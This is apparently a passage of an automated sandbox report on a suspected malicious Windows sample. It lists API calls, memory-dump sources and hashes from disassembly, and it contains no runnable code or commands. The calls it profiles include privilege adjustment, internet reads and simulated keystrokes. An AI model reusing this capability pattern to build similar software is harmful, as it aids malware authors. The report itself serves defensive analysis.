                                                                                                                • Opcode Fuzzy Hash: 8cce6cf882eb6c83262b2dadc6d58b37974b18ed36bcebc1f6ccbd1fb097d54a
                                                                                                                • Instruction Fuzzy Hash: 0CD0A730444732AFC7354F61EC086A37EE8BB21304F18841AF491D2250D7B8C884CA60
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F
                                                                                                                • GetCursorPos.USER32(?), ref: 004FF211
                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0050E4C0,?,?,?,?,?), ref: 004FF226
                                                                                                                • GetCursorPos.USER32(?), ref: 004FF270
                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0050E4C0,?,?,?), ref: 004FF2A6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1423138444-0
                                                                                                                • Opcode ID: 0a744380f35149b2cca9ebf910729778f608774c02428a507794c42bd954a3c2
                                                                                                                • Instruction ID: ac51ca0b72ea40086cd69b5a7c08390b6b4e95cfd1494cf4c8b69d7aab3e20c9
                                                                                                                • Opcode Fuzzy Hash: 0a744380f35149b2cca9ebf910729778f608774c02428a507794c42bd954a3c2
                                                                                                                • Instruction Fuzzy Hash: D721F238500018AFDB258F84D858EFB7FB5FF09310F0580AAFA054B2A1C3399954EBA4
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F
                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000020,?,00000000), ref: 004AB5A5
                                                                                                                • GetClientRect.USER32(?,?), ref: 0050E69A
                                                                                                                • GetCursorPos.USER32(?), ref: 0050E6A4
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0050E6AF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1010295502-0
                                                                                                                • Opcode ID: a52f0aa4e14c150c59a33443ac2c1f411ca28057fcf72573fbf9f987f66c4001
                                                                                                                • Instruction ID: 02c228862402942e8f44bdf28f763b39d06733311e3614faacc731de79bea84f
                                                                                                                • Opcode Fuzzy Hash: a52f0aa4e14c150c59a33443ac2c1f411ca28057fcf72573fbf9f987f66c4001
                                                                                                                • Instruction Fuzzy Hash: F4113631900029BBCB10DFA4D9469EE7BB9FF29309F104456E902E7141D738AA86DBA9
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F
                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 004AB22F
                                                                                                                  • Part of subcall function 004AB55D: NtdllDialogWndProc_W.NTDLL(?,00000020,?,00000000), ref: 004AB5A5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DialogNtdllProc_$LongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1155049231-0
                                                                                                                • Opcode ID: 21d8ce2d9a69f0d2c32c28bc4fc39d601889b21e70714b34a237d2e630d28a12
                                                                                                                • Instruction ID: c5584f631389400ca581803c6d58c1145463f17a909a80325bc7043235c2f704
                                                                                                                • Opcode Fuzzy Hash: 21d8ce2d9a69f0d2c32c28bc4fc39d601889b21e70714b34a237d2e630d28a12
                                                                                                                • Instruction Fuzzy Hash: 5DA12371114105BADA286A2A4C9EFBF2D5CFB73344B24495FF901D62D3DB1D9C02A2BB
                                                                                                                APIs
                                                                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,004E43BF,00000000), ref: 004E4FA6
                                                                                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 004E4FD2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 599397726-0
                                                                                                                • Opcode ID: d9aa1f16ca1b736624ee0876a5e226c31f27d3d9c2e669c0096bc9c696a9ad5e
                                                                                                                • Instruction ID: af601d599a14b61edf8845d35b1bee01621ef63bbe02f2705b6d67b547a40780
                                                                                                                • Opcode Fuzzy Hash: d9aa1f16ca1b736624ee0876a5e226c31f27d3d9c2e669c0096bc9c696a9ad5e
                                                                                                                • Instruction Fuzzy Hash: 02410B71904245BFEB20DF86DC85EBF77BCEB8071AF10405FF20566181D6799E4196A8
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 004DE20D
                                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 004DE267
                                                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 004DE2B4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                                • String ID:
                                                                                                                • API String ID: 1682464887-0
                                                                                                                • Opcode ID: b7edd3eecc02cc4ef9fdd049b260af9fd2e9cc09d05be2330264ca7edeee9377
                                                                                                                • Instruction ID: 63e239a5eeb7b29172cd30d19327cf2d3e62bf6eafb44b4db8ddc01b5dd7b052
                                                                                                                • Opcode Fuzzy Hash: b7edd3eecc02cc4ef9fdd049b260af9fd2e9cc09d05be2330264ca7edeee9377
                                                                                                                • Instruction Fuzzy Hash: C6219D35A00118EFCB00EFA5D894AEDBBB8FF59314F0480AAE905AB351DB359905CB54
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AF4EA: std::exception::exception.LIBCMT ref: 004AF51E
                                                                                                                  • Part of subcall function 004AF4EA: __CxxThrowException@8.LIBCMT ref: 004AF533
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004CB180
                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004CB1AD
                                                                                                                • GetLastError.KERNEL32 ref: 004CB1BA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 1922334811-0
                                                                                                                • Opcode ID: 6521675667d4c411fb036eaa90b7cab7898cf39704dd3337786b45efa602afab
                                                                                                                • Instruction ID: e1488895b4183fac7f841fe70dd26b78433a2873ad9e5530392136693d768875
                                                                                                                • Opcode Fuzzy Hash: 6521675667d4c411fb036eaa90b7cab7898cf39704dd3337786b45efa602afab
                                                                                                                • Instruction Fuzzy Hash: FE11CEB2900304AFE718AFA4DCC6D6BB7BCFB58350B20852EE45693240EB74FC458A64
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004D6623
                                                                                                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 004D6664
                                                                                                                • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004D666F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 33631002-0
                                                                                                                • Opcode ID: 162bdad4e95a41ef459c36caf80e25db0a641da4ab17a8ab1dc8b5759976d4cf
                                                                                                                • Instruction ID: 676c981f3238431163392a25a3b0c85fc501ce60c2e041dde6e1c3ac60380784
                                                                                                                • Opcode Fuzzy Hash: 162bdad4e95a41ef459c36caf80e25db0a641da4ab17a8ab1dc8b5759976d4cf
                                                                                                                • Instruction Fuzzy Hash: B5115E71E01228BFDB108FA9DC44BEFBBBCEB49B10F108152F910E7290D3B05A059BA5
                                                                                                                APIs
                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004D7223
                                                                                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 004D723A
                                                                                                                • FreeSid.ADVAPI32(?), ref: 004D724A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 3429775523-0
                                                                                                                • Opcode ID: 6ff12d0e28daae4e072a19c84222a4c5f3bad06044ac565112825a41954754b9
                                                                                                                • Instruction ID: 465faee852b0a73eadb53e7080792637f95dbd35c56c6a44d035a7f9ef976a91
                                                                                                                • Opcode Fuzzy Hash: 6ff12d0e28daae4e072a19c84222a4c5f3bad06044ac565112825a41954754b9
                                                                                                                • Instruction Fuzzy Hash: 33F01275904209BFDF04DFE5DD9DAEEBBB9EF08301F108469A502E2191E2755744DB14
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F
                                                                                                                  • Part of subcall function 004AB526: GetWindowLongW.USER32(?,000000EB), ref: 004AB537
                                                                                                                • GetParent.USER32(?), ref: 0050E5B2
                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,004AB1E8,?,?,?,00000006,?), ref: 0050E62C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LongWindow$DialogNtdllParentProc_
                                                                                                                • String ID:
                                                                                                                • API String ID: 314495775-0
                                                                                                                • Opcode ID: c173683e6030b5cbea3f8bc1907dd5c7e12059c717c5d8a861423e79d5b1e7e7
                                                                                                                • Instruction ID: c6413bf5cfa2ae33f9afe10dab307ed0810bf430c92dbd8463bfc272abb65061
                                                                                                                • Opcode Fuzzy Hash: c173683e6030b5cbea3f8bc1907dd5c7e12059c717c5d8a861423e79d5b1e7e7
                                                                                                                • Instruction Fuzzy Hash: 75219134601504AFCF248B289C95AAE3F96EF6B328F184657F9294B3E2C7359D01D798
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004DF599
                                                                                                                • FindClose.KERNEL32(00000000), ref: 004DF5C9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 2295610775-0
                                                                                                                • Opcode ID: ce818b74c777511ca743372e52ee42cbfc1225ee14323ac93c8762014ccdc11d
                                                                                                                • Instruction ID: 6f1574044db1565d49d55e40050b6ac8d6c0fdb3c834f55255566d678836709a
                                                                                                                • Opcode Fuzzy Hash: ce818b74c777511ca743372e52ee42cbfc1225ee14323ac93c8762014ccdc11d
                                                                                                                • Instruction Fuzzy Hash: 461182316002009FD710EF29D855A6EB7E5FF95324F00851EF86597391DB74A9058B95
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F
                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0050E44F,?,?,?), ref: 004FF344
                                                                                                                  • Part of subcall function 004AB526: GetWindowLongW.USER32(?,000000EB), ref: 004AB537
                                                                                                                • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 004FF32A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                                                                                • String ID:
                                                                                                                • API String ID: 1273190321-0
                                                                                                                • Opcode ID: 45aa5c3395d9b7c129b91a347fefcb669f51b9751149d95a19b8f159ac5954d2
                                                                                                                • Instruction ID: f32f71d94b5d7a69572ee13140a5959df23f9389b2ef4db9b086679774aefced
                                                                                                                • Opcode Fuzzy Hash: 45aa5c3395d9b7c129b91a347fefcb669f51b9751149d95a19b8f159ac5954d2
                                                                                                                • Instruction Fuzzy Hash: 2501D230200208ABCB219F54DC54FBA3B66FF95325F14456AFD050B2A0C735980ADB59
                                                                                                                APIs
                                                                                                                • ClientToScreen.USER32(?,?), ref: 004FF6AC
                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0050E52B,?,?,?,?,?), ref: 004FF6D5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientDialogNtdllProc_Screen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3420055661-0
                                                                                                                • Opcode ID: ce3a065beff234b98e3525ffef337786b5bc94d2264d725c0abe6bda1b30a250
                                                                                                                • Instruction ID: 586b9e0e7336bb7033fa739f1ba4ccd7653093022877fd53143e8431cc32cf77
                                                                                                                • Opcode Fuzzy Hash: ce3a065beff234b98e3525ffef337786b5bc94d2264d725c0abe6bda1b30a250
                                                                                                                • Instruction Fuzzy Hash: 25F03A72410218FFEF048F85DC09AFE7FB9EF54311F14401AFA01A2160D7B5AA55EB64
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,004EBE6A,?,?,00000000,?), ref: 004DCEA7
                                                                                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,004EBE6A,?,?,00000000,?), ref: 004DCEB9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFormatLastMessage
                                                                                                                • String ID:
                                                                                                                • API String ID: 3479602957-0
                                                                                                                • Opcode ID: 7c939f5e9b53898412b262a3189031a3bd2f6ca23932b02c7d7e148ac68d4258
                                                                                                                • Instruction ID: 15ebd53eb9f393053e8c57ebb22e84f0f22cf3760a7c51aa7cd25a00c7f1ed7f
                                                                                                                • Opcode Fuzzy Hash: 7c939f5e9b53898412b262a3189031a3bd2f6ca23932b02c7d7e148ac68d4258
                                                                                                                • Instruction Fuzzy Hash: EDF08275100229ABDB10ABA4DC89FEA776DBF08355F008166F919D6181D7349A44CBB5
                                                                                                                APIs
                                                                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 004D4153
                                                                                                                • keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 004D4166
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InputSendkeybd_event
                                                                                                                • String ID:
                                                                                                                • API String ID: 3536248340-0
                                                                                                                • Opcode ID: aef28939c379fd2b23fd6fe954f4e804348fc9ddd535c357c8dfff8adc8189b6
                                                                                                                • Instruction ID: dd312f73f47b2091a785dabeabb4b10a68402efed170cf0f13209cd8fdc223aa
                                                                                                                • Opcode Fuzzy Hash: aef28939c379fd2b23fd6fe954f4e804348fc9ddd535c357c8dfff8adc8189b6
